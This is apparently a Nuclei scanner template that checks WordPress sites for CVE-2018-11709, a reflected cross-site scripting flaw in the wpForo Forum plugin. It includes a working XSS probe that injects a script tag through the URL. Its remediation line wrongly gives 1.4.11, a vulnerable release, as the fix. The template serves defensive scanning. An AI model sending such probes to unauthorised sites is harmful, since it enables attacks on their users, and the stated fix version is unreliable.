id: CVE-2018-11709 info: name: WordPress wpForo Forum <= 1.4.11 - Cross-Site Scripting author: daffainfo,s4e-io severity: medium description: WordPress wpForo Forum plugin before 1.4.12 for WordPress allows unauthenticated reflected cross-site scripting via the URI. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the wpForo Forum plugin (1.4.11) or apply the vendor-provided patch to fix the vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2018-11709 - https://wordpress.org/plugins/wpforo/#developers - https://wpvulndb.com/vulnerabilities/9090 - https://blog.dewhurstsecurity.com/2018/06/01/wp-foro-wordpress-plugin-xss-vulnerability.html - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-11709 cwe-id: CWE-79 epss-score: 0.04346 epss-percentile: 0.89111 cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: gvectors product: wpforo_forum framework: wordpress tags: cve,cve2018,wordpress,xss,wp-plugin,gvectors,vuln http: - method: GET path: - '{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word part: body words: - "" - type: word part: body words: - "wpforo" case-insensitive: true - type: word part: header words: - text/html - type: status status: - 200 # digest: 4a0a00473045022100b0bc2a400b85b2206a580edf131db4d907a3222fc84093ea26db90b3d3bf9519022038c15088b63043333d633c9c5a8b6fe50b100ac114d1807866a1f277d527b20e:922c64590222798bb761d5b6d8e72950